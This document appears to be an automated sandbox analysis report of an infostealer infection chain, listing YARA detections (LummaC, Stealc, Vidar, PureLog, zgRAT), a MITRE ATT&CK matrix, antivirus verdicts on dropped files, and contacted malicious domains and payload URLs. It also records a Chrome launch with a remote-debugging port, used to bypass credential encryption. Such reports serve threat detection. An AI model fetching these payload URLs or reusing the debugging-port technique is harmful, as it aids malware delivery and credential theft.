Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 0000000E.00000003.3893497573.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.3894979273.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1c8dd6ecf9.exe PID: 3924, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: dfa5c95181.exe PID: 6896, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 1c8dd6ecf9.exe PID: 3924, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 49.2.1fa18d372f.exe.44d94e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.0.1fa18d372f.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.1fa18d372f.exe.44d94e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.3396644733.0000000004479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000000.3376964125.0000000000E62000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000009.00000002.3659341926.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3764438263.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3755390540.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3670040217.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3202576047.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2997018123.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 6523f73121.exe PID: 4132, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match

File source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E1307A sqlite3_transfer_bindings,	9_2_61E1307A
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D5E6 sqlite3_bind_int64,	9_2_61E2D5E6
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D595 sqlite3_bind_double,	9_2_61E2D595
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E0B431 sqlite3_clear_bindings,	9_2_61E0B431
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E037F3 sqlite3_value_frombind,	9_2_61E037F3
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D781 sqlite3_bind_zeroblob64,	9_2_61E2D781
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D714 sqlite3_bind_zeroblob,	9_2_61E2D714
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D68C sqlite3_bind_pointer,	9_2_61E2D68C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D65B sqlite3_bind_null,	9_2_61E2D65B
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D635 sqlite3_bind_int,	9_2_61E2D635
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D9B0 sqlite3_bind_value,	9_2_61E2D9B0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D981 sqlite3_bind_text16,	9_2_61E2D981
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D945 sqlite3_bind_text64,	9_2_61E2D945
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D916 sqlite3_bind_text,	9_2_61E2D916
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D8E7 sqlite3_bind_blob64,	9_2_61E2D8E7
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E038CA sqlite3_bind_parameter_count,	9_2_61E038CA
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E158CA sqlite3_bind_parameter_index,	9_2_61E158CA
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E038DC sqlite3_bind_parameter_name,	9_2_61E038DC
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E2D8B8 sqlite3_bind_blob,	9_2_61E2D8B8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	41 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	22 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	248 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	112 Process Injection	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	8101 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	12 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	391 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	391 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	112 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	60%	Virustotal		Browse
file.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	54%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	54%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs

Name	IP	Active	Malicious
example.org	93.184.215.14	true	false
pancakedipyps.click	104.21.23.76	true	true
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false
plus.l.google.com	142.250.181.46	true	false
home.fivetk5vt.top	176.53.146.212	true	true
fivetk5vt.top	176.53.146.212	true	true
contile.services.mozilla.com	34.117.188.166	true	false
youtube.com	142.250.181.110	true	false
play.google.com	142.250.181.110	true	false
ipv4only.arpa	192.0.0.171	true	false
grannyejh.lat	172.67.179.109	true	true
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false
www.google.com	172.217.19.228	true	false
httpbin.org	34.226.108.155	true	false
spocs.getpocket.com	unknown	unknown	false
sweepyribs.lat	unknown	unknown	true
detectportal.firefox.com	unknown	unknown	false
content-signature-2.cdn.mozilla.net	unknown	unknown	false
apis.google.com	unknown	unknown	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	true
http://185.215.113.206/68b591d6548ec281/nss3.dll	true
https://treehoneyi.click/api	true
grannyejh.lat	true
https://lossekniyyt.click/api	true
https://github.com/Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe	false
https://httpbin.org/ip	false
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false

URLs from Memory and Binaries

Name	Source	Malicious
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
http://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttp://po	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000001C.00000002.3328507756.000001F4B68D7000.00000004.00000800.00020000.00000000.sdmp	false
https://mail.google.com/mail/?extsrc=mailto&url=%sPdfJs.init	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://spocs.getpocket.com/spocs	firefox.exe, 0000001C.00000002.3352472754.000001F4C652B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3399651010.000001F4CEB9D000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill	firefox.exe, 0000001C.00000002.3399651010.000001F4CEB03000.00000004.00000800.00020000.00000000.sdmp	false
https://screenshots.firefox.com	firefox.exe, 0000001C.00000002.3350103609.000001F4C621F000.00000004.00000800.00020000.00000000.sdmp	false
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 0000001C.00000002.3376026938.000001F4C8803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3376613883.000001F4C8931000.00000004.00000800.00020000.00000000.sdmp	false
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://grannyejh.lat/apiup	1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/mozilla-services/screenshots	firefox.exe, 0000001C.00000003.3142720138.000001F4C6832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3364738253.000001F4C6D00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3141322555.000001F4C6810000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3140571050.000001F4C6600000.00000004.00000800.00020000.00000000.sdmp	false
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def	firefox.exe, 0000001C.00000002.3382631506.000001F4C8E4D000.00000004.00000800.00020000.00000000.sdmp	false
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
http://exslt.org/common	firefox.exe, 0000001C.00000002.3332029856.000001F4C2026000.00000004.00000800.00020000.00000000.sdmp	false
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	firefox.exe, 0000001C.00000002.3344466497.000001F4C3C55000.00000004.00000800.00020000.00000000.sdmp	false
https://ok.ru/	firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://www.google.com/policies/privacy/2	firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	false
http://exslt.org/dates-and-times	firefox.exe, 0000001C.00000002.3332029856.000001F4C2061000.00000004.00000800.00020000.00000000.sdmp	false
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 0000001C.00000002.3340270619.000001F4C2E7C000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	1c8dd6ecf9.exe, 0000000E.00000003.3458065844.0000000005959000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3457774732.000000000595B000.00000004.00000800.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	firefox.exe, 0000001C.00000002.3384980497.000001F4C9CF1000.00000004.00000800.00020000.00000000.sdmp	false
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr	firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	false
https://www.bbc.co.uk/	firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	false
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	false
https://bugzilla.mo	firefox.exe, 0000001C.00000002.3366625964.000001F4C716A000.00000004.00000800.00020000.00000000.sdmp	false
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
http://185.215.113.16/off/def.exe	1c8dd6ecf9.exe, 0000000E.00000003.4508866474.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4415308381.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509197578.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.4509426428.0000000001123000.00000004.00000020.00020000.00000000.sdmp	false
https://spocs.getpocket.com/	firefox.exe, 0000001C.00000002.3400687379.000001F4CEBE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3350103609.000001F4C62D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3242565379.000001F4CE951000.00000004.00000800.00020000.00000000.sdmp	false
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://ebay.comP	firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp	false
https://www.iqiyi.com/	firefox.exe, 0000001C.00000003.3244021428.000001F4C8BD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3409616699.000004D6E5300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3412664948.000016C1A2200000.00000004.00000800.00020000.00000000.sdmp	false
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://www.amazon.com/Z	firefox.exe, 0000001C.00000002.3325687566.000001C5C2A00000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/x	1c8dd6ecf9.exe, 0000000E.00000003.3850555176.0000000001111000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3893613500.0000000001111000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 0000001C.00000003.3242565379.000001F4CE966000.00000004.00000800.00020000.00000000.sdmp	false
https://grannyejh.lat/apiY	1c8dd6ecf9.exe, 0000000A.00000002.3187229462.0000000001128000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000A.00000003.3178194377.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false
https://yandex.com	firefox.exe, 0000001C.00000002.3410454102.00000F0B1BE00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3342111899.000001F4C3100000.00000002.00000001.00040000.0000001C.sdmp	false
https://grannyejh.lat/apib	1c8dd6ecf9.exe, 0000000E.00000003.3850555176.0000000001129000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpo	6523f73121.exe, 00000009.00000002.3690395511.000000000B6B2000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpq	6523f73121.exe, 00000009.00000002.3670040217.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpx	6523f73121.exe, 00000009.00000002.3670040217.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	false
https://monitor.firefox.com/about	firefox.exe, 0000001C.00000002.3330718417.000001F4B8210000.00000002.08000000.00040000.00000000.sdmp	false
https://account.bellmedia.c	firefox.exe, 0000001C.00000002.3369975124.000001F4C7578000.00000004.00000800.00020000.00000000.sdmp	false
http://youtube.com/	firefox.exe, 0000001C.00000002.3352798382.000001F4C669E000.00000004.00000800.00020000.00000000.sdmp	false
https://login.microsoftonline.com	firefox.exe, 0000001C.00000002.3395867553.000001F4CE913000.00000004.00000800.00020000.00000000.sdmp	false
https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto	firefox.exe, 0000001C.00000002.3348433206.000001F4C4360000.00000002.08000000.00040000.00000000.sdmp	false
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839	firefox.exe, 0000001C.00000002.3357051773.000001F4C6A60000.00000004.00000800.00020000.00000000.sdmp	false
